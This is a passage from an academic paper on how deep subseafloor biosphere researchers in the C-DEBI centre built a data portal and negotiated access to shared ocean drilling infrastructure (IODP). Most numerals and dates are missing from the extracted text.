to the nsf, and operating documents for c-debi and iodp/iodp . these documents function as scalar devices by giving details and metrics about activities, plans, and available infrastructural resources. our research also draws heavily on semi-structured interviews; the sample for this article consists of people, which includes c-debi-affiliated scientists, curators and managerial staff involved in iodp/iodp , as detailed in table . the column involved in iodp indicates which c-debi interviewees are involved in decision- or policy-making in iodp/iodp . these interviewees are further split into two groups: those in cruise operations, and those with the consortium for ocean leadership, responsible for administering us involvement in iodp (but not iodp ). interviews ranged in length darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the composition of our interview sample. career stage interviewees involved in iodp c-debi usa-based undergraduate graduate student postdoctoral researcher faculty management non-usa-based faculty total c-debi iodp cruise operations curator staff scientist technical support ocean leadership policy data management total iodp from min to two and one-half hours, with the majority being between one and two hours long. with the consent of the interviewees, interviews were recorded and sent to an external company for transcription. 
c-debi interviewees were initially recruited from those scientists being observed in the laboratory, and were typically interviewed after an extended period of observation. other c-debi interviewees were recruited from those who had been awarded c-debi-funded grants, with these interviews typically taking place over skype. we have interviewed undergraduate and graduate students, postdoctoral researchers, faculty members, and non-scientists with senior level roles in administering and operating c-debi. iodp interviewees were identified and approached through a range of methods, including personal introductions from c-debi-affiliated scientists and other iodp personnel, and from public websites. our interviews covered a range of topics, including interviewees’ backgrounds and career trajectories. we asked scientists and technical staff detailed questions about the scientific work they are undertaking and the importance and role of data in their work. we also asked iodp/iodp technical staff and c-debi scientists who have participated in iodp cruises about their work on board expeditions, how they negotiate for access to cruise resources, and how they transfer data, methods, techniques, and collaborative networks between cruises and their onshore laboratories. non-scientists were asked about their roles in building and administering c-debi and iodp/iodp infrastructure. where interview quotations are used in this paper, we add a code in parentheses after each quote indicating whether they are iodp or c-debi, their career stage, and a number unique to each interviewee: (iodp curator, # ) or (c-debi faculty, # ) etc. data analysis our initial data analysis involved close reading of our ethnographic notes, interview transcripts, and documents. based on these readings, we identified emerging themes about the relational, complex, and dynamic nature of knowledge infrastructures, and coded our darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data accordingly. in particular, we focused on themes relating to how those we interviewed described their own work (scientific, organizational, building infrastructure); how they identified and defined communities of which they considered themselves members; what resources, both current and anticipated, they identified as necessary to their own work and to deep subseafloor biosphere research as a whole; what they considered to be infrastructure; and how they and their community engaged with other scientific communities to negotiate, access, and build infrastructure. we refined our coding scheme iteratively, going back and forth between our scheme and the data. using a range of sources enables us to triangulate, cross-checking our data to validate our findings (o’donoghue & punch, ). we began our data analysis after completing approximately six months of laboratory observation and fifteen interviews. we have thus been able to strike a balance between ensuring that our observations have not been biased by preconceived ideas and being able to assess our emerging findings and tentative hypotheses against further observations. we presented our emerging findings to the deep subseafloor biosphere research community at major scientific meetings (see above) for feedback and clarification. results deep subseafloor biosphere research is a relatively new domain of study. 
significant momentum for its emergence came in the late s upon the publication of an article that extrapolated data about the size of microbiological communities in coastal sediments to the deep subseafloor (whitman, coleman & wiebe, ). that article concluded that deep subseafloor microbes might constitute up to one-third of all of earth’s biomass. this claim had major implications for important questions of scientific and human concern, such as the global nitrogen cycle. as a new domain of scientific study, and one for which little data existed prior to its emergence, the strategy of founding scientists rested on acquiring more data for research. this pursuit of more and better quality data continues to be a critical force to this day. results are grouped into three sections. first, we frame the data scarcity problem in the terms of the deep subseafloor biosphere research community. second, we discuss how this new research community established relationships with the international drilling programs, which is their major data source, and built some of their own complementary infrastructure. in this section, we also compare c-debi’s choices of infrastructure for data management to those of other nsf science and technology centers that were founded in the same time period. third, we explore how the c-debi and ocean drilling programs worked together, in ways more and less successful, to develop a robust research community for deep subseafloor biosphere research. data scarcity complaints by deep subseafloor biosphere scientists about the ‘‘dearth of data’’ for their core research questions led to the founding of c-debi (edwards, : ). relevant data still exist only for a few sites in the ocean and, compared to studies of microbial ecology in other environments, is about relatively basic phenomena. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. two reasons emerged for the community’s continuing concern with data scarcity. the first is constraints on scientists’ ability to pursue their field’s immediate research objectives, which are to characterize deep subseafloor microbial communities in terms of the quantity and types of microbes that exist, how these microbes interact with the physical environment they inhabit, and how microbial communities vary between geographic sites on the seafloor (orcutt et al., ). as a c-debi report stated, ‘‘evidence for microbial alteration [of the physical environment] exists, yet scientists lack robust molecular, biochemical, or physiological data so needed’’ (center for dark energy biosphere investigations, , p. ). the second concern about data scarcity relates to the status of deep subseafloor biosphere research relative to studies of microbial ecology in other environments, and thus for their ability to attract future resources and funding. in the words of many scientists that we stud- ied, research on the deep subseafloor biosphere is largely exploratory or discovery-driven, while research on microbial ecology in other environments is largely hypothesis-driven: ‘‘our work in the lab in general tends to be classified as rather exploratory as opposed to hypothesis-driven. this is something...that i met researchers who take issue with because they insist that to be a true science, proper science, you need to have a question and then you need to have a methodology that will either answer ‘yes’ or ‘no’, or some number. 
whereas, our kind of science is oftentimes, it’s more like, ‘i wonder if...’ and then you try something and the results are occasionally interesting, and then you go, ‘look what i found.’ you didn’t know what you were looking for, you just cast a big net out.’’ (c-debi graduate student, # ) as some c-debi scientists stated the problem, if the approach of deep subseafloor biosphere researchers has a lower scientific status than studies of microbial ecology in other environments, they will receive fewer or smaller grants because ‘‘funding agencies will rarely fund basic discovery science’’ (teske, biddle & schrenk, , p. ). as the deep subseafloor biosphere emerged as a domain of study, researchers adopted a strategy of building and leveraging infrastructure to acquire more data. one of their strategies was to build infrastructure specifically for deep subseafloor biosphere researchers, first by establishing c-debi. the second strategy was to use c-debi as a means to gain greater access to, and to reconfigure, iodp for their advantage. notably for our research questions, iodp/iodp is an infrastructure that deep subseafloor biosphere research shares with other scientific domains. iodp/iodp provides the requisite infrastructure for the c-debi community to access the geographic sites and to acquire the physical samples necessary to produce data about the deep subseafloor biosphere. c-debi was initially established as a way to consolidate the position of the deep subseafloor biosphere within iodp and to recruit new researchers into the domain. over time, c-debi also began to build its own infrastructure to respond to the limitations of iodp in providing data, and to reconfigure the iodp infrastructure so that a greater share of iodp resources will be allocated to deep subseafloor biosphere researchers, thus increasing their supply of data. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ocean drilling meets deep subseafloor biosphere research interest in deep subseafloor microbial life that emerged in the late s coincided with institutional challenges facing scientific ocean drilling programs. the predecessors to iodp that ran from to focused almost exclusively on physical science research. these programs facilitated major scientific successes. best known is the evidence for the theory of plate tectonics and continental drift (committee on the review of the scientific accomplishments and assessment of the potential for future transformative discoveries with us-supported scientific ocean drilling, ). many scientists were concerned that funding for ocean drilling would cease with the anticipated end of the ocean drilling program, iodp’s immediate predecessor, in . expanding the drilling mission to include the deep subseafloor biosphere provided the momentum necessary to secure funding for iodp to launch in . one of our interviewees, a senior administrator within iodp, quoted admiral watkins, who then headed the joint oceanographic institutions, ‘‘i can remember ...him saying, ‘give me bugs and i can give you a new program’’ (iodp policy, # ). c-debi as a single-domain infrastructure to reconstruct the origins of c-debi as an infrastructure for the emergent community of deep subseafloor biosphere researchers, we drew heavily upon documentary sources to complement our interviews and ethnography. the round of proposals for the launch of iodp was a critical inflection point. 
deep subseafloor biosphere research was one of three major scientific foci for iodp (integrated ocean drilling program (iodp) planning sub committee (ipsc) scientific planning working group, ), which planned four to five expeditions per year. proposals were required to state the scientific objectives of the cruise and to identify the sites a cruise would visit. three separate teams of scientists independently, and successfully, submitted proposals (in , , and respectively) for expeditions focused primarily on the deep subseafloor biosphere (although an iodp/iodp cruise will typically have a focus on one particular scientific domain, it will nevertheless involve scientists from all domains of study represented within iodp/iodp ). rather than work independently, the successful teams joined forces to coordinate the three biosphere-focused iodp cruises, which were planned for and . to consolidate the position of deep subseafloor biosphere research within iodp, in they established the dark energy biosphere investigations research coordination network. this network had four specific goals (edwards & amend, , p. ): • ‘‘develop an interactive community of deep-biosphere researchers • facilitate coordination of science between deep-biosphere drilling projects • stimulate interaction and education among disparate disciplines • enable synthesis and integration of data and technology advances’’ this network brought together scientists in regular face-to-face meetings, with the proposal to the nsf for c-debi in arising from one such meeting. c-debi, as introduced above, is a science and technology center (stc) funded by the us national science foundation (nsf), initially for five years from – , and subsequently renewed for another five years from – . the proposal to establish c-debi set darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. out two major goals. one is ‘‘to coordinate, integrate, support, and extend the science’’ of deep subseafloor biosphere research, and the second to help ‘‘foster and educate an interdisciplinary community of deep subseafloor biosphere researchers, with a focus on students and junior researchers’’ (edwards, : ). the focus on students and junior researchers highlights the aspiration to establish an enduring community. the significance of this long-term view was highlighted, sadly, by the deaths of two of the five founding co-investigators during the first five years of c-debi. it is a tribute to their vision that the collaboration was sufficiently robust to reorganize with new investigators and to win the second five-year award. c-debi has developed social, technical, and policy means to pursue its aims, including funding support for scientists, a website and meetings to circulate knowledge and to bring together globally distributed researchers, and an infrastructure for data management that continues to evolve. in its early years, c-debi focused more on recruiting scientists to study the deep subseafloor biosphere than on building technical or policy infrastructure. recruiting occurs by distributing grants to support small-team (usually two or three persons) laboratory-based research projects (typically one to three years in length), or graduate and postdoctoral fellowships. 
these grants typically support projects in which scientists use cores collected from scientific ocean drilling cruises to produce new data in their onshore laboratories, and to support projects that develop new techniques to study the deep subseafloor biosphere. to date, nearly such grants have been distributed across more than institutions in the usa (center for dark energy biosphere investigations, ). however, in the early years of c-debi, these grants were not accompanied by a strategy for managing the data produced by the funded projects. c-debi data portal although the c-debi proposal aspired to build data management infrastructure, stating that ‘‘c-debi will develop and maintain a website for public access and data sharing among the c-debi research community’’ (edwards, : ), little was accomplished toward this goal in the first two years of operation. the first five-year strategic implementation plan – claimed ‘‘technical difficulty’’ as the barrier to establishing the data management infrastructure (center for dark energy biosphere investigations, ; ). however, by , data management infrastructure became part of the work of c-debi. this plan stresses that the ‘‘c-debi stc is committed to open access for all information and data gathered during scientific research that is conducted as part of c-debi’’ (center for dark energy biosphere investigations, a: ). starting in , c-debi responded to new nsf requirements by mandating that participating scientists must make data publicly available after a moratorium, typically two years. c-debi developed their data management strategy as part of their application for renewal of nsf funding for the second five-year period, – . the most critical strategic challenge for c-debi during its first years of operation was to navigate this nsf renewal process successfully. the c-debi data portal, comprising a registry and repository, is a central element of c-debi’s strategic goals for their second five-year project (center for dark energy biosphere investigations, a). c-debi requires participating teams to register all associated datasets darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that support published results on the portal, and to deposit them in a relevant, online, publicly accessible database. the portal contains metadata about each dataset, including details about the provenance of the cores used (including the name of the research site, the cruise number, and the specific drill hole(s) where the samples originated), and a link to the dataset if it is hosted externally. in mid- , c-debi assembled a team to build the data portal, which included one co-pi, a scientific database expert from another c-debi institution, and the c-debi administrative assistant. since the center’s inception, the administrative assistant had responsibility for building and maintaining the c-debi project website. his job was expanded to include leading the development of the data portal. c-debi allocated substantial funding to portal development: $ , in and an additional $ , for (center for dark energy biosphere investigations, b). the first phase, which included prototyping and site architecture, was completed for the nsf visit to c-debi in january . subsequently, the job title of the administrative assistant was changed to data manager, reflecting the shift in the importance to c-debi of data management infrastructure from a marginalized aspiration to a central goal. 
alternative approaches to single-domain infrastructure the existence of the data portal, and the form it takes, is only partially determined by nsf requirements. to determine the degree to which the form of c-debi data management infrastructure is driven by nsf data management requirements, we examined how other nsf science and technology centers have addressed these requirements. c-debi is one of current stcs, all of which are subject to nsf data release requirements. however, the stcs interpret these requirements in a variety of ways. hence, only three of the other ten stcs operate an online, publicly-accessible registry or repository to make these data accessible, whether by downloading datasets, by providing links to other sources, or by providing contact information for people associated with datasets (center for coastal margin observation & prediction, ; center for microbial oceanography research and education, a; center for remote sensing of ice sheets, ). the data registries or repositories of these stcs vary in the types of datasets they contain and in the scope of metadata they capture about each dataset. the center for microbial oceanography research and education, or c-more, is the stc most scientifically comparable to c-debi, in that they study microbial ecology in the ocean and scientists use samples collected from ocean research cruises operated directly by c-more. c-debi is distinguished from other stcs with online data infrastructure by requiring the most comprehensive set of metadata for datasets in its registry and repository. for example, while both the c-debi and c-more registries have a category to name the research cruise from which each dataset was derived (center for microbial oceanography research and education, b), c-debi also has a category for the precise geographic location from where the sample was drawn. another example is that the c-debi registry has metadata categories detailing the publication(s) in which a particular dataset has been used; by contrast, the c-more registry does not. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the current stcs have implemented the nsf requirements in different ways, despite their scientific and organizational similarities. in other words, the existence of the nsf requirements do not completely account for what data management policies or infrastructure are implemented by c-debi, nor do they account for the specific form and function of these policies and infrastructure. shared infrastructure and community building iodp/iodp expeditions are the primary source of physical samples and data used in the onshore laboratories of the deep subseafloor biosphere researchers we studied. some scientists also participate in cruises operated by other organizations (university- national oceanographic laboratory services, ). however, these non-iodp/iodp cruises usually revisit sites drilled during previous iodp/iodp expeditions. international ocean drilling programs iodp/iodp is infrastructure, consisting of ships, scientific equipment and personnel, and an organizational structure shared between the deep subseafloor biosphere community and several other domains. consequently, these domains compete for scarce resources. their representatives are involved in decision-making processes within iodp/iodp about the scope of their programmatic research and the organization of specific cruises. 
the expansion of iodp scientific activities to include deep subseafloor biosphere research required other domains to concede some of their share of iodp resources. while our c-debi participants generally reported a collegial atmosphere among scientists on iodp/iodp cruises, many deep subseafloor biosphere researchers nevertheless encounter resistance, such as objections to the number of cores allocated to deep subseafloor biosphere researchers: ‘‘we encounter resistance [from other domains] when we apply to sail. we encounter it when we apply for sample requests. we encounter it when we set up for post-cruise fundings, and also for regular grant writing.’’ (c-debi faculty, # ) increased competition for places on cruises is but one of the ways in which other domains concede resources to accommodate research about the deep subseafloor biosphere. a wider variety of domains also compete for allocation of cores, the precious sources of physical and microbiological data from cruises. initial decisions made on board the ships determine the core’s value to these competing communities. the most critical initial decision for the microbiology community is the temperature at which cores are stored. while samples for physical analysis are typically stored at − ◦c, samples for microbiological analysis are typically stored at − ◦c to avoid contamination and to stabilize biological material. other handling decisions include the ways in which the cores are cut and distributed to participating scientific teams. the number of cores per cruise is finite, therefore producing more cores suitable for microbiological analysis results in fewer cores suitable for physical science analysis: ‘‘what you do with this core you just split these one meter sections lengthwise, open it up so you have two halves of it.... for microbiology and geochemistry you do it somewhat differently. you take the core, you’re not cutting it up lengthwise but you cut out short darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sections...so you lose the entire stratigraphic information from that core.’’ (c-debi faculty, # ) the allocation of cores to research teams requires intensive negotiation. pre-cruise meetings to negotiate allocations result in a sampling plan for the voyage. during a cruise, sampling plans frequently are adapted to changing conditions and to the relative success of core sampling, leading to further negotiation of resources: ‘‘sometimes ...we don’t receive that much [biological] core material. sometimes you may have a small piece and people want something from the small piece so then that has to go through iterations of compromise.’’ (iodp curator, # ) as a new area of science, a particular challenge for deep subseafloor biosphere researchers is their own methodological diversity. the lack of agreement within the deep subseafloor biosphere research community on standard practices for data handling works against them in negotiating for more cores. as discussed in more depth elsewhere (darch & sands, ), workflows to characterize microbiological communities in cores vary significantly, even between scientists working on adjacent benches in the same laboratory. 
scientists from other domains sometimes use this variation to argue against allocation of cores to deep subseafloor biosphere researchers, as one of our interviewees encountered: ‘‘those that are competing with us for sediment material, the hard rocks guys, the sedimentologists, those guys that are then lobbying for the same sediment samples that we’re going after, they can turn to us and say, ‘well, you know what, if we handed you half of this and you half of this, you guys would come back with two different datasets, so what’s the point of handing it to any of you because you guys can’t describe it in the same way anyway?’ ’’ (c-debi faculty, # ) as iodp approached the end of its funding period in , concerns arose among stakeholders about continued government funding for scientific ocean drilling cruises, and indeed, funding was reduced for iodp’s successor, iodp (committee on guidance for nsf on national ocean science research priorities: decadal survey for ocean sciences, ). however, the physical infrastructure (cruise ships, core repositories, data management systems) of iodp is largely that of iodp. in addition to maintaining their position within iodp , deep subseafloor biosphere researchers also aspire to secure more resources for deep subseafloor biosphere research in the future. one aspiration is to produce more standardized data on board the ocean drilling cruises, akin to the standardized set of analyses of physical properties that are routinely conducted and made publicly available through an iodp database. as no comparable set of standards exists for the microbiological properties, cruises neither conduct nor report basic microbiological descriptions of cores. many of the c-debi-affiliated scientists interviewed mentioned this lack of agreement around standardized methods as a serious constraint on their scientific progress (orcutt et al., ). instead, individual scientists devote much effort to basic microbiological analyses in their home laboratories. the time and expense of basic description limits the resources available to conduct more advanced analyses, as explained by one of our interviewees: darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘post-expeditions awards provide $ , worth of support for up to two years, for you to do the research that you proposed to do while you were at sea ...the difference between what we can use that money for, and say what a sedimentologist can use that money for, is grossly different. because a sedimentologist, the geochemist, the petrologist, the paleo-mag guys, all of them pretty much have all the data. and so, they’re looking at the $ , as seed money to maybe do some analysis that they maybe pay for a grad student, maybe pay for a technician, maybe pay for somebody’s time, to analyze it, to maybe take it another di- rection...for the biologist, we have $ , to now process all of our samples, do all the se- quence analysis, do the bulk labor of all of our work on the equipment that we already have to have in our lab versus what everybody else is using on the ship.’’ (c-debi faculty, # ) however, to include microbiological description of cores on board all cruises would require major reconfiguration of existing cruise practices. these practices were established over many years before microbiology’s inclusion in cruises: ‘‘it took them decades to come up with the system... standard protocols, standard proce- dures, standard storage. 
it makes it a little bit rigid like i said, when you do something new and novel, like the living things don’t really have a place yet.’’ (c-debi faculty, # ) consequently, attempts to change iodp practices in support of deep subseafloor biosphere research would require a significant amount of effort and would diminish the resources available for more physical science-oriented domains in iodp . to date, these attempts have faced considerable resistance: ‘‘geochemical and geophysical research objectives represented on iodp expeditions are routinely provided by dedicated shipboard scientists and technicians assigned to completing standard procedures on all core material. the call for an additional biological workload on these individuals is typically met with an argument claiming a lack of time and resources on board.’’ (orcutt et al., , p. ) one of our interviewees told us that much of the resistance from these physical scientists is that, ‘‘as a community [of deep subseafloor researchers], we can’t agree on anything’’ regarding methodology. while this resistance on the part of physical science disciplines appears to be motivated by a fear of losing iodp resources, their arguments are that the lack of standardization of microbiological workflows means that microbiological analyses cannot be included as part of the workflow on iodp cruises. consequently, many c-debi scientists recognize that the deep subseafloor biosphere community must undertake the work necessary to standardize microbiological workflows. infrastructure convergence the development of the c-debi data management infrastructure can be understood in the light of the aspirations of deep subseafloor biosphere researchers to improve exploitation of currently-available resources from iodp/iodp cruises, and to reconfigure iodp infrastructure to secure a greater share of drilling cruise resources. those developing c-debi infrastructure are working towards three goals: better curation and circulation of darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. extant data; building a community with norms of open data; and explicating the roles of iodp/iodp data in c-debi research. here we examine how c-debi is addressing these three goals, and how the goals both shape, and are shaped by, the relationships between c-debi and iodp/iodp infrastructure. improving curation of extant data the first goal of the c-debi data management infrastructure is to improve the curation, circulation, and accessibility of data handled by the deep subseafloor biosphere researchers. at a project workshop held in that brought together many leading members of c-debi, ‘‘encouragement of data sharing ...was identified as an important priority’’ (center for dark energy biosphere investigations, b, p. ). despite the scarcity of cores and of resources to analyze them, deep subseafloor biosphere researchers often do not take the steps necessary to preserve these data beyond the short-term or to make them easily accessible to fellow members of their domain. this situation is compounded by disparate policies and uneven provision of community databases across the scientific disciplines involved in deep subseafloor biosphere research. 
scientists who publish in most microbiological journals are required to deposit genomic sequence data supporting their conclusions to publicly accessible databases such as genbank (benson et al., ), although these databases do not cover the full range of microbiological data produced by deep subseafloor biosphere scientists. no similar requirement to deposit exists for complementary physical science data. some appropriate databases do exist but contributions of data are at the discretion of the scientist, and occur rarely, as illustrated by this quotation: ‘‘nowadays they won’t publish your work if it has molecular [biology] data and it’s not in the database somewhere...there are now databases where you could, i guess, submit this type of data like the geological data. but i haven’t started doing that yet.’’ (c-debi postdoctoral researcher, # ) the c-debi data portal is intended to provide a home for these microbiological data. at one level, the goal of improved curation, accessibility, and circulation of data can be understood as a desire to increase the amount of scientific work accomplished from the limited amount of cores and data currently available. however, this goal also can be understood in terms of pursuing longer-term strategic objectives of the deep subseafloor biosphere community. standardized approaches will support data integration and meta- analyses, for example. better data curation will enable ‘‘our community to develop and recommend broad standards’’ (center for dark energy biosphere investigations, b, p. ), in turn helping to promote some of the methodological standardization necessary to address the criticisms of physical science researchers. deep subseafloor biosphere researchers have promoted standardized methods as a means to advance hypothesis-driven science and replicability (teske et al., ). they expect better replicability to address concerns about the status of their field. the belief that methods for deep subseafloor biosphere research should be standardized was far from unanimous, however. as explored in more depth in darch ( ), some darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. members view methodological heterogeneity as a key strength of the domain, with researchers from diverse disciplinary backgrounds bringing new methods to bear on research questions. a particular concern is that standardizing methods of this emergent domain is premature, and will foreclose possibilities for more efficient or reliable methods in the future. although these debates are ongoing, proponents of standardization hold key decision-making positions within c-debi. consequently, the design of c-debi data infrastructure promotes methods standardization. community building since c-debi’s conception, project leadership recognized the potential of data infrastructure to link distributed scientists (edwards, ). in particular, the c-debi data portal is intended to ‘‘support the connection among scientists and others in ...c-debi’’ (center for dark energy biosphere investigations, a, p. ). the portal is an important element to sustain and expand the community beyond the project’s anticipated end in , given that years is the maximum nsf stc funding. as one of our interviewees explains, ‘‘the web-based database for the entire subseafloor biosphere community will be an important legacy of c-debi’s contribution’’ (c-debi management, # ). 
c-debi hopes that its data portal will emulate other successful scientific databases that began as project-specific endeavors and became institutionalized with subsequent funding. however, c-debi does not merely seek to build a community through its data management infrastructure; it also seeks to foster particular norms among community members, notably a collaborative ethos predicated on openness and sharing of knowledge and knowledge products. as a consequence of this design and policy, scientists who do not conform to the norms of openness and data sharing are likely to be excluded. in turn, by fostering openness norms, data will be more widely available and exploited more fully. the norms are not ends in themselves, but intended to address scientific and strategic goals of studies of the deep subseafloor biosphere to obtain the needed volume and variety of data. furthermore, c-debi also hopes that by helping to foster and strengthen an enduring community of researchers, their project’s legacy will ensure continued strength in advocating for deep subseafloor biosphere’s role in iodp . explicating iodp/iodp contributions to c-debi given the resistance from physical science disciplines, and in light of future uncertainties around funding, deep subseafloor biosphere researchers must demonstrate that their inclusion in scientific ocean drilling cruises has resulted in scientifically valuable output. by demonstrating scientific value, they hope to secure continued iodp resources and to reconfigure iodp infrastructure in their favor. articles in scholarly journals demonstrate scientific productivity, but do not necessarily highlight the essential or precise contributions of iodp data to their findings. subseafloor biosphere research reports tend to integrate data from multiple sources, including cruises conducted under the auspices of organizations other than iodp/iodp . journal articles also report analyses of data derived in laboratory conditions that are based on cores or on instruments in drill holes left by those cores. the challenge facing the c-debi community, therefore, is to make more explicit the relationship between their own scientific output, iodp/iodp cruises, and other kinds of darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data. one way in which c-debi is addressing this challenge is by assigning appropriate categories of metadata in its data portal. these categories include information about the origin of the cores from which the data have been derived, such the name of the research site, the cruise number, and the specific drill hole(s) where the samples originated. such metadata serves several purposes. one is to improve the provenance of the data, which enhances replicability. another is to improve integration of data from multiple sources. a longer-term benefit is to provide evidence that deep subseafloor biosphere researchers can use in negotiations with iodp , both to gain more access to cruises and to reconfigure iodp practices in describing biological characteristics of cores. the need to demonstrate the value of iodp/iopd to c-debi research thus motivates the development of the c-debi data portal and the choices of metadata categories. discussion deep subseafloor biosphere researchers faced data scarcity, which they addressed by attempting to increase the volume and variety of data available to them. 
the entire research area emerged in the late s and early s when scientific data about the subseafloor became a viable goal. as more data became available, strategies for growing their research base evolved. this community continues to seek more data as a means to accomplish science at faster rates. as they matured as a community, they became increasingly concerned about their scientific status in relation to studies of microbial ecology in other environments. they altered their strategy for advancement accordingly (kragh, ; lenoir, ; paul, ). here, we explicate two broad themes that emerge from our case study. the first is data scarcity—what it means for a scientific domain to experience data scarcity, what the implications are for its status, and how the domain addresses this scarcity. the second is the politics of knowledge infrastructures. a scientific domain may build and configure infrastructure specific to itself and also infrastructure shared with other domains. data scarcity terms like ‘‘big data’’ and ‘‘little data’’ are commonly employed to denote the scale of data to which scientific domains have access (borgman, ). ‘‘data scarcity’’ is a more poignant term as it suggests a state that is unsatisfactory for a domain’s practitioners (sawyer, ). the degree of data scarcity can be understood only in relation to that domain’s scientific objectives. as emergent scientific domains such as the deep subseafloor biosphere struggle to survive and thrive, they must attract resources to support researchers and infrastructure. to justify support for public funding in highly competitive environments, scientific domains must demonstrate their utility by contributing to one or both of the following: . issues of major political and social concern (mukerji, ), such as those relating to the environment, agriculture, and national defense; . existential questions about humanity, such as the origins and evolution of life, and the origins and extent of the universe (bowler & morus, ). c-debi makes both claims: study of the deep subseafloor biosphere will contribute significantly to understanding the effects of global environmental change, and to the darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. origins and evolution of life. the deep subseafloor biosphere domain faces data scarcity because it aspires to pursue its scientific objectives in a more statistically intensive manner than is afforded by the data to which it currently has access. for instance, domain scientists would like to answer questions about the global distribution of microbes, which is essential to understanding the role of the deep subseafloor biosphere in important environmental processes. to answer these questions, scientists must be able to perform meta-analyses that involve aggregating datasets about the size and composition of microbial communities in many different sites of the ocean. at present, insufficient data currently exists to make accurate estimates about the global distribution of microbes. leaders of the deep subseafloor biosphere community wish to shift the research emphasis from discovery to hypothesis-driven science, bringing their domain into line with other domains of microbiology. hypothesis-driven science, involving statistical methods to test hypotheses, is generally regarded as more scientifically credible than discovery-driven science (lenoir, ; paul, ). 
these scientists wish to test the effects of environmental changes on the ability of different types of microbes to survive and thrive. others wish to study microbes’ abilities to survive and adapt to extreme conditions, such as those that may have been present when life on earth began. knowledge infrastructures our account of c-debi infrastructure is enriched by understanding relationships between this single-domain infrastructure and the complexities of iodp/iodp , and by examining how infrastructure negotiations influence access to resources. we observe a mutual shaping of the single-domain and shared infrastructure, driven by the deep subseafloor biosphere researchers’ desire to address their data scarcity. the case presented in this paper contributes to studies of knowledge infrastructures (edwards, ; edwards et al., ) in two respects. first, although infrastructure components often are shared and negotiated between multiple domains, surprisingly few studies have paid close attention to the difficulties of sharing infrastructural resources (benson, ; ribes & bowker, ; ribes & finholt, ). our study pays close attention to how scientists from the deep subseafloor biosphere have negotiated a share of scarce resources of iodp/iodp , thus extending research on negotiating shared infrastructure. second, very few studies offer accounts of how an infrastructure emerges in relation to other infrastructures upon which a domain may depend. the case presented in this article is an exemplar of configurations of knowledge infrastructure common to many domains of science. here, the knowledge infrastructure of the deep subseafloor biosphere includes a major component shared with other domains, and another major component that it wholly controls. further, this case demonstrates how building a single-domain infrastructure unfolds both in response to, and as a significant intervention in, the configuration of shared infrastructure. although building the single-domain c-debi infrastructure may appear intended to provide immediate resources to scientists, it is also a means to access a greater portion of the shared infrastructure of iodp/iodp . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. how domains share or build their own infrastructures infrastructural approaches are commonly used to gain access to data resources, and to facilitate shifts toward more data-intensive epistemologies (bowker, ; bowker, ; chow-white & garcía-sancho, ). scientific domains can engage in infrastructure- building activities to increase opportunities for producing, analyzing, aggregating, accessing, circulating, and long-term curating of data. existing studies suggest these activities follow one of two strategies. the strategy most widely studied involves a domain that builds infrastructure intended exclusively for itself. the second strategy, documented in a few studies, involves a domain that constructs infrastructure to share with other domains, either by building new multi-domain infrastructure or by negotiating access to extant infrastructure that already serves other domains (benson, ; ribes & bowker, ; ribes & finholt, ). one contribution of our study is to demonstrate that a single scientific domain may pursue both strategies simultaneously. 
the deep subseafloor biosphere scientists constructed infrastructure specific to the domain (c-debi and its data portal) and negotiated greater access to infrastructure shared with other domains (ocean drilling programs such as iodp/iodp ). the single-domain c-debi infrastructure was built in response to the constraints and opportunities of the multi-domain iodp/iodp infrastructure. when multiple domains share infrastructure, they compete for elements of design and operation that serve their needs, such as choices of what data are to be collected and what standards are to be applied. infrastructure is built on an installed base, so that adaptations are both afforded and constrained by the configurations of extant infrastructure (star & ruhleder, ). hence, when a scientific domain first seeks access to an infrastructure controlled by other domains, they may need to adapt their scientific practices accordingly (benson, ). this was the situation faced by deep subseafloor biosphere scientists in gaining access to the iodp/iodp infrastructure, which had established procedures for collecting, curating, and accessing samples and data; for ship-based facilities; and had favored geographic locations for scientific ocean-drilling cruises. these pre-existing practices helped to shape and constrain the scientific research opportunities of deep subseafloor biosphere scientists. one way to acquire more data is to distribute funding accordingly. other studies have observed cases where infrastructure is designed to increase data production (lenoir & hays, ; strauss, ) or to coordinate distributed sites of data collection (aronova, baker & oreskes, ). the motivations of c-debi are similar, with top priority assigned to exploiting cores whose allocation between domains is hotly contested. a second way to maximize scientific work is to aggregate and integrate existing data more effectively (leonelli & ankeny, ; meyer, ), for instance by embedding common standards within or across domains (bowker, ; leonelli & ankeny, ) or by building links between members of the domain and fostering norms of data sharing and openness across this domain (kelty, ; leonelli, ). the c-debi data infrastructure exists to foster collaboration among other deep subseafloor biosphere researchers, and to assemble and circulate data produced by distributed domain scientists. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. building and converging infrastructures the single-domain c-debi infrastructure was designed in response to scarce iodp/iodp resources for deep subseafloor biosphere science. however, c-debi also can be understood as a means to negotiate a greater share of the iodp/iodp infrastructure. negotiations between domain representatives are a typical feature of projects to build shared infrastructure (ribes & bowker, ; ribes & finholt, ). ribes & finholt ( ) focus on the importance of defining and representing the interests of the communities involved. c-debi, and its associated data infrastructure, exemplifies such a strategy. it was formed to build a strong, enduring community that speaks with one voice, creating a larger presence of deep 